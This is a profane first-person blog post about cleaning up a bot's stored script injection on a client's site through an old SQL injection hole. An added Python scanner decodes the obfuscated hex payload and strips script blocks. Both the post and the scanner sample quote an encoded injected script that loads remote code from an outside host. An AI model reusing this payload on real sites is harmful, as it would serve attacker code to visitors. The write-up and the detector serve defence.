Today was... invigorating... to say the least at my day job. We maintain a rather large code base for a client of ours that contained some older code in its deepest, darkest nether-regions that allowed for some SQL injection to take place. Although I know I was likely fighting against some junk ass bot, it felt like my opponent was flesh and blood.

Here's how it went down:

BOT: Injects silly script tag

<script>my lame ass portal full of shit</script>

or...
<script>
var news="b20b3cb73b63b72b69b70b74b20b73b72b63b3db22b68b74b74b70b3ab2fb2fb70b6fb72b74b61b6cb2eb61b63b72b61b73b2eb69b6eb2fb6db6cb2eb70b68b70b22b3eb3cb2fb73b63b72b69b70b74b3e";
docs = news.replace(/b/g,'%');
document.write(that var named docs that I'm not actually going to put in here...);
</script>

ME: finds no trace in CF error logs and sets up a kill script in SQL to remove junk, continues to look for the entry point.
BOT: Injects more crap. This time changing the script's contents.
ME: creates a trigger on the targeted table to remove on update/insert - suck a fat one. Continues to look for the entry point.
BOT: ...
BOT: ...
BOT: ...
BOT: modifies script tags just enough to bypass trigger checks.
ME: hm, how clever you piece of junk.
ME: locks down the site's datasource to read-only and proceeds to set up read and read/write DSNs, some regex find-and-replace goodness and... once again... suck it!

I do enjoy a good duel from time to time, but not when I've got shit to do. So, whoever you are, "portal.acras.in", nice try, but not good enough. DIAF KKTHXBYE.
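As an added example (my own code, not from the post or the client's code base), here is a small Python scanner for the stored content: it finds the "b"-for-"%" hex encoding used in the injected script above, decodes it to show what the payload actually drops into the page, and does the regex find-and-replace cleanup on a column value. The sample value is constructed around the encoded string quoted in the post; the function names are my own.

```python
import re

# Constructed sample of one stored column value. The 'b'-delimited hex string is the
# one quoted in the post; the document.write() argument is left out, as the post leaves it out.
SAMPLE_VALUE = (
    '<p>Latest news</p><script> var news="b20b3cb73b63b72b69b70b74b20b73b72b63b3db22'
    'b68b74b74b70b3ab2fb2fb70b6fb72b74b61b6cb2eb61b63b72b61b73b2eb69b6eb2fb6db6c'
    'b2eb70b68b70b22b3eb3cb2fb73b63b72b69b70b74b3e"; docs = news.replace(/b/g,\'%\');'
    ' </script>'
)

# Eight or more "b" + hex-pair triples in a row; shorter runs are too noisy to flag.
HEX_RUN = re.compile(r'(?:b[0-9a-fA-F]{2}){8,}')
SCRIPT_TAG = re.compile(r'<\s*script\b', re.I)
SRC_ATTR = re.compile(r'src\s*=\s*["\']([^"\']+)', re.I)
SCRIPT_BLOCK = re.compile(r'<\s*script\b[^>]*>.*?<\s*/\s*script\s*>', re.I | re.S)


def decode_run(run: str) -> str:
    """Undo the obfuscation: each 'bXX' triple is one byte whose '%' was swapped for 'b'.
    Parsing by triple (rather than replace('b', '%')) avoids mangling hex digits that are 'b'."""
    raw = bytes(int(run[i + 1:i + 3], 16) for i in range(0, len(run), 3))
    return raw.decode('latin-1')


def scan_value(value: str) -> dict:
    """Report plain and hidden script markup in one stored value, plus any src URLs
    the decoded payload would load."""
    hidden = []
    for m in HEX_RUN.finditer(value):
        decoded = decode_run(m.group())
        hidden.append({
            'offset': m.start(),
            'decoded': decoded,
            'has_script': bool(SCRIPT_TAG.search(decoded)),
            'srcs': SRC_ATTR.findall(decoded),
        })
    plain = bool(SCRIPT_TAG.search(value))
    return {
        'plain_script': plain,
        'hidden': hidden,
        'suspicious': plain or any(h['has_script'] for h in hidden),
    }


def strip_scripts(value: str) -> str:
    """Cleanup pass for an affected column: drop whole <script>...</script> blocks."""
    return SCRIPT_BLOCK.sub('', value)
```

Run it over every text column of the affected table; the `srcs` list is what you block at the outbound proxy and hand to the client as the indicator.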